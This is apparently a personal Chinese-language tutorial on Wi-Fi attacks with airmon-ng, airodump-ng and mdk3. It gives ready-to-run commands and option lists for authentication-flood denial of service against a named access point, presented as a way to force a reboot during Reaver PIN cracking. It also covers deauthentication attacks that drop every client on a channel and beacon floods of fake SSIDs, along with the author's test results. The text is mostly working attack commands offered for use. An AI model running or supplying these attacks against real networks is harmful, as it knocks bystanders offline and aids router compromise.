airmon-ng start wlan0 將網卡轉換為監聽模式
airodump-ng wlan0mon 查找附近無線網絡
mdk3 wlan0mon a -a E4:D3:32:8C:B3:AA
Authentication DoS:(洪水攻擊,又叫做身份驗證攻擊)
這是一種驗證請求攻擊模式:在這個模式里,軟件自動模擬隨機產生的mac向目標AP發起大量驗證請求,可以導致AP忙於處理過多的請求而停止對正常連接客戶端的響應;這個模式常見的使用是在reaver窮據路由PIN碼,當遇到AP被“pin死”時,可以用這個模式來直接讓AP停止正常響應,迫使AP主人重啟路由!
mdk3 mon0 a
-a #測試指定BSSID
-m #使用有效數據庫中的客戶端mac地址
-c #對應 -a ,不檢查是否測試成功
-i #對指定BSSID進行智能攻擊
-s #速率,默認50
上面一條命令會循環發送大量驗證信息給AP,過不了幾分鍾,AP就會卡死, 如果路由器有防DOS的功能的話,這個不好用
經過測試 一般等幾分鍾 wifi就會斷開,在手機wifi列表里都找不到,如果停止攻擊的話 wifi列表繼續出現。
mdk3 wlan0mon d -c 11 攻擊指定的頻道, 讓頻道為 11 所有計算機都掉線
經過測試 所有11的頻道的wifi都沒有出現在wifi列表 ,停止攻擊后,我的HE-503 wifi 依然要等一分鍾左右才能連接上
Deauthentication/Disassociation Amok:
這個模式看名稱就知道大概了:強制解除驗證解除連接!在這個模式下,軟件會向周圍所有可見AP發起循環攻擊......可以造成一定范圍內的無線網絡癱瘓(當然有白名單,黑名單模式),直到手動停止攻擊!
mdk3 mon0 d
-w #白名單mac地址列表文件
-b #黑名單mac地址列表文件
-s #速率,這個模式下默認無限制
-c [chan,chan,chan,...] #信道,可以多填,如 2,4,5,1
beacon flood mode:
這個模式可以產生大量死亡SSID來充斥無線客戶端的無線列表,從而擾亂無線使用者;我們甚至還可以自定義發送死亡SSID的BSSID和ESSID、加密方式(如wep/wpa2)等。
詳細命令如下:
mdk3 mon0 b
-n #自定義ESSID
-f #讀取ESSID列表文件
-v #自定義ESSID和BSSID對應列表文件
-d #自定義為Ad-Hoc模式
-w #自定義為wep模式
-g #54Mbit模式
-t # WPA TKIP encryption
-a #WPA AES encryption
-m #讀取數據庫的mac地址
-c #自定義信道
-s #發包速率
mdk3 --help b #查看詳細內容
mdk3 wlan0mon b -n 123456789 創建一個123456789的wifi
mdk3 wlan0mon b -f wifi.txt –t –c 6 –s 80
mdk3 wlan0mon b -f wifi.txt
創建自定義文本里的wifi
用其他手機可以看到產生大量wifi,不知道為什么我的小米手機看不到。。。。 經過測試沒有問題,中文可以正常顯示。
mdk3 wlan0mon b -g -c 11 -h 7 創建一大堆亂碼wifi